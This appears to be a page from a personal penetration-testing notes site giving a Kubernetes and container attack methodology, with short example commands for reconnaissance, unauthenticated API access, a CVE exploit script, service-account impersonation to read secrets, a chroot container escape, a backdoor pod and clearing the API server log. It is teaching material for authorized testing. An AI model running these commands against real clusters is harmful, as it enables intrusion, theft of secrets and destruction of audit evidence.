👾
ctrl-z
  • 👋Welcome to ctrl-z
  • Cheat Sheets
    • Helpful Command QR
    • Footprinting
    • Information Gathering
    • File Transfers
    • LFI
    • MetaSploit
      • Using msfconsole
      • Creating Metasploit Payloads
    • Shells
      • Shells and Payloads
      • Shell Cheatsheet
    • Password Attacks
    • Attacking Common Services
    • Pivoting & Port Forwarding
    • Web Attacks
      • SQL
        • MySQL & SQLi
        • SQLmap
      • Fuzzing w FFUF
      • Bruteforce w Hydra
      • XSS
    • Active Directory
      • Intro to AD
      • AD Enum&Attack
      • RPC-Client
      • 🥝mimikatz
      • NTLM Relay Attacks
    • 💢Buffer Overflow
    • Priv Esc
      • Linux Priv Esc
      • Windows Priv Esc
        • mimikatz
  • Tools
    • Containers
      • Kubernetes
      • Container Testing Methodology
      • Dropping Kali in your test space
    • Cloud
      • aws cli
    • Command Line
      • Linux Basic CML
      • Windows CML
      • Mac CML
    • Redteam & C2
      • Covenant C2
    • JS Deobuscation
    • Crackmapexec
  • Scripts
    • Priv Esc
  • Loot
  • Write Ups
    • Inject (active at the time)
Powered by GitBook
On this page
  • Kubernetes/Container Penetration Testing Methodology
  • 1. Reconnaissance
  • 2. Initial Access
  • 3. Privilege Escalation
  • 4. Post-Exploitation
  • 5. Covering Tracks
  • 6. Reporting
  1. Tools
  2. Containers

Container Testing Methodology

Kubernetes/Container Penetration Testing Methodology

1. Reconnaissance

  • Gather information about the target environment

  • Identify exposed services and endpoints

Commands:

# Scan for open ports
nmap -sV -p- <target_ip>

# Identify Kubernetes API server
curl -k https://<api_server_ip>:6443/version

# Enumerate subdomains
subfinder -d <domain>

2. Initial Access

  • Exploit exposed services

  • Gain a foothold in the cluster

Commands:

# Test for unauthenticated access to API server
kubectl --insecure-skip-tls-verify -s https://<api_server_ip>:6443 get pods

# Exploit known vulnerabilities (e.g., CVE-2018-1002105)
./cve-2018-1002105.sh https://<api_server_ip>:6443

3. Privilege Escalation

  • Escalate privileges within the cluster

  • Move laterally between pods/nodes

Commands:

# List service accounts and their permissions
kubectl get serviceaccounts
kubectl get clusterrolebindings

# Exploit overly permissive RBAC rules
kubectl --as=system:serviceaccount:default:default get secrets

# Escape container to host
docker run -v /:/host -it ubuntu chroot /host

4. Post-Exploitation

  • Access sensitive data

  • Maintain persistence

  • Pivot to other parts of the infrastructure

Commands:

# Access secrets
kubectl get secrets -o yaml

# Create backdoor pod
kubectl apply -f malicious-pod.yaml

# Exploit kubelet API for node access
curl -k https://<node_ip>:10250/pods

5. Covering Tracks

  • Remove evidence of intrusion

  • Clean up temporary files and logs

Commands:

# Delete pods
kubectl delete pod <compromised_pod>

# Clear logs
echo > /var/log/kubernetes/kube-apiserver.log

6. Reporting

  • Document findings

  • Provide remediation recommendations

Key Areas to Address:

  • Misconfigurations

  • Vulnerabilities in images or components

  • Overly permissive RBAC rules

  • Insecure network policies

  • Lack of encryption or proper authentication

Remember to always get proper authorization before performing any penetration testing activities.

PreviousKubernetesNextDropping Kali in your test space

Last updated 11 months ago